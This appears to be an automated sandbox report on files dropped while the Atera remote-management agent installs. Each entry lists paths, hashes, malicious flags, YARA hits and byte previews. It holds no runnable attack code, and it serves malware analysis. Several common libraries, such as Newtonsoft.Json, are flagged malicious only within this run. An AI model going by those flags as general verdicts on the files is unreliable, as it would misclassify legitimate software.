                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):535
                                                                                                                                                                                                                                        Entropy (8bit):5.076084597400077
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdG3VO3rdZRLNFF7ap+5v5OXrRf/2//FicYo4xm:JdfrdDPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                        MD5:D505E3DE03F172FA2B246E210054C5F7
                                                                                                                                                                                                                                        SHA1:F5A480F56F760EEBA3B29108387E54D70A721127
                                                                                                                                                                                                                                        SHA-256:A568F933F09B1AD1EE5E88DDCFFA1FE5921D18B73477136E1FAEE55F2BEF399A
                                                                                                                                                                                                                                        SHA-512:80F01447B43525DBDF5B283522FE14D9AECEF16E55EA3FE36DC0A94B53C49E03BB56136F0911C348FB78FB5AF6112B1DE7C38CBFFBD73ACB2971655EF1B2B859
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXSjn:WBa
                                                                                                                                                                                                                                        MD5:7E9C5492C1485A2AE94A108F6FFEEA95
                                                                                                                                                                                                                                        SHA1:F00A6A35F3D41AFF9ED2C028C26D918EEF06B715
                                                                                                                                                                                                                                        SHA-256:04CA73099B2058974220319A7CC3E156AE24AFA13B28F340E8D97B021D1BBC95
                                                                                                                                                                                                                                        SHA-512:191B4297645813DD163611547EC2708BD6678E535429FC4D771472BC185C887CAF24FAAA7F1DCF78577739E3D06387A756A11193C68918DDF47D21328CA1E4DC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=27.2

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.179944898759355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:XJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwm:XQUm2H5KTfOLgxFJjE50vksVUfPvCz
                                                                                                                                                                                                                                        MD5:9A344D6A16A6FEF791701FC52FA722A2
                                                                                                                                                                                                                                        SHA1:7F1CEF75650CA626D79F7F15818851A9C297F65E
                                                                                                                                                                                                                                        SHA-256:80890B7E8F3CC557A87BB1F84C7C30CA9B08B3F8AA68184D99439305EF91388E
                                                                                                                                                                                                                                        SHA-512:93ED10309A2EA138FE31BE55F82627290DDA0F8B7AEA63A54D97BB6EF2985BCC0449FCCC288DEF154D9F3318FB4DA9CAC3FBB4727986997DD1CDD5C97541139E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ....................................`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):186416
                                                                                                                                                                                                                                        Entropy (8bit):5.934478472448458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:6kfZS7FUguxN+77b1W5GR69UgoCaf8/BCnfKlRUjW01KyFes:0+c7b1W4R6joxfQ8p
                                                                                                                                                                                                                                        MD5:A68241D6E026F218B259FD2CE8F744C0
                                                                                                                                                                                                                                        SHA1:DEA3F011BBC728DB750A054CCF3C5FDFE583EB91
                                                                                                                                                                                                                                        SHA-256:B0F5B75176B338F03AF4BB287259F36167D86C7A6EF128FE021B7401854F2362
                                                                                                                                                                                                                                        SHA-512:1CBFA69C0F75ADAC4C61A84A803201E1897B2A24E50570C44048C6DDAB57A03A1DEBEE04671A8F1FE83745ECD8A91447A4E4E10611811A8B136B3B2016EAD119
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..Z.........." ..0...... ......~.... ........... ...............................P....@.................................,...O.......................0(........................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331824
                                                                                                                                                                                                                                        Entropy (8bit):6.168966743027853
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:KBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTe:KDMUWITZznu85k8Wdn8KmCjIFi3VvC
                                                                                                                                                                                                                                        MD5:DE6B588BD13AFFC760EE32D105C77A21
                                                                                                                                                                                                                                        SHA1:F9D20F683938F0347F0C2782D0E05FCFA143CEE1
                                                                                                                                                                                                                                        SHA-256:07762DCF4082B9A14BEC37573058015F03D26B46B9A6B7B0C0E66402CBE256F1
                                                                                                                                                                                                                                        SHA-512:6D0947E89ED1BF942C6BB93309BDD45B83FD92A3B8D0C4E3265A581DB9318B88187BDE5A58CFB5EE3A7BFE48167D4438B85D9FF03283C73A97B1C6022FE7CBCE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@...........@.....................................O.......................0(... ..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............9..............H.............................................{....*..{....*V.(......}......}....*...0..A........u3.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q6....6...-.&.+...6...o.....%..{.......%q7....7...-.&.+...7...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u8.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.9607419702126485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:cBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUZ:cBjk38WuBcAbwoA/BkjSHXP36RMGw
                                                                                                                                                                                                                                        MD5:C2EBB296A9B097C4BC36018341C2F514
                                                                                                                                                                                                                                        SHA1:55B79CCD4F93AC6EF3AE6E2AD858DE5F23516EC9
                                                                                                                                                                                                                                        SHA-256:3CFB2C5E1947565F0795FCF5C0587B8F021842D52E79A40F25070BCABCE48089
                                                                                                                                                                                                                                        SHA-512:BF95FA3B93A25E040D3521BF8436BBA505D09F659360C0606F259607083D9C4F1366683CFE0215D4F13CE875E753B12F1DE058A3D0CBB84C3948644D0E7BDEEB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ....../t....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55856
                                                                                                                                                                                                                                        Entropy (8bit):6.2394409505734165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:rREoc0f5k1KlLoz0WOySMEpnSO7iX16UJKdiYpBEpYinAMxCWLa:rR8+5k15z0WBZEtgwJq7Hx3u
                                                                                                                                                                                                                                        MD5:89D62604A1CA22A2F8FFD987B543D38E
                                                                                                                                                                                                                                        SHA1:64D7D345821AA76971BB9EF71CE731CCD9BFAC32
                                                                                                                                                                                                                                        SHA-256:80D4A38A5C0F117AFC7FC74A3F2DA39259BDD980BBA85687FF2019C8262E171D
                                                                                                                                                                                                                                        SHA-512:1173C7AFE2719EF324342A6D3EA459319533843CFE8A04CDC63FCF3D8A2D6DC4BB537FC1A4DBA63F585EB11F3E16FB2F17C53BC64BC7318A52B44266A3A9A56E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<V.........." ..0.................. .........c. ....................... .......e....`.................................P...O.......H...............0(........................................................... ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........".................."..P............................................................................................0.......................0.......................................................................................0...............0...................................................................................................0...............0...................................................0...............0..........................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):753
                                                                                                                                                                                                                                        Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                        MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                        SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                        SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                        SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallState

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7466
                                                                                                                                                                                                                                        Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                        MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                        SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                        SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                        SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
